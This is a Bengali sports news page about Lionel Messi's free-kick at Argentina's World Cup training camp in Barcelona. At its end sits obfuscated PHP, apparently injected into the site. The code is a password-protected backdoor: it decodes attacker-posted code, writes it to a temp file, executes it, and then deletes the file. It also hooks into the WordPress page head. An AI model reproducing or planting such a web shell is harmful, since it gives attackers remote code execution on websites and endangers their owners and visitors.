সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

অনুশীলনে মেসির জাদুকরী ফ্রি-কিক (ভিডিও)

news-image

স্পোর্টস ডেস্ক: তাকে ঘিরেই স্বপ্ন দেখছে একটা দেশ। তাকে ঘিরেই রণনীতি তৈরি করতে চান কোচ। তাই লিওনেল মেসিকে খুশি রাখার যাবতীয় চেষ্টা চলছে আর্জেন্টিনা শিবিরে। যে কারণেই মেসির ‘দ্বিতীয় ঘর’ বার্সেলোনায় চলছে আর্জেন্টিনার বিশ্বকাপ প্রস্তুতি।

ক্যাম্পে আর্জেন্টিনা অধিনায়ক খোশ-মেজাজেই আছেন। অনুশীলনেও সেরাটাই দিচ্ছেন মেসি। যেমন মেসির পা থেকে পাওয়া গেছে এক দুরন্ত ফ্রিকিক।

রোববার আর্জেটাইন ফুটবল ফেডারেশনের টুইট করা ভিডিওতে দেখা গেছে, মেসির ফ্রিকিক গোলকিপারকে বোকা বানিয়ে পোস্টের কোণ ঘেঁষে জালে জড়িয়ে যায়।

রোববার অনুশীলনে দলকে দুটি ভাগে ভাগ করে খেলান কোচ হোর্হে সাম্পাওলি। প্রথম দলে ছিলেন ১৫ জন ফুটবলার। যারা মূলত ডিফেন্ডার এবং ডিফেন্সিভ মিডফিল্ডার। অন্য দলে ছিলেন তারা, যাদের ওপর আক্রমণের দায়িত্ব থাকবে।

যে দলে স্বাভাবিকভাবেই ছিলেন মেসি। সঙ্গে ছিলেন আগুয়েরো, হিগুয়াইন, দিবালা, ডি মারিয়ার মতো ফুটবলার।

অনুশীলনের পর দলের আলোচনার কেন্দ্রে ছিল মেসির সেই জাদুকরী ফ্রিকিক। বক্সের বাইরে থেকে বাঁ-পায়ে মারা কিক বাতাসে বাঁক খেয়ে জালে জড়িয়ে যায়। গোলকিপার কোনো সুযোগই পাননি বাঁচানোর।

বার্সেলোনার অনুশীলন মাঠে চলছে আর্জেন্টিনার ক্যাম্প। ক্যাম্প শেষে ইসরাইলের সঙ্গে একটি প্রীতি ম্যাচ খেলে ১০ জুন রাশিয়ায় উড়ে যাবেন মেসিরা।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}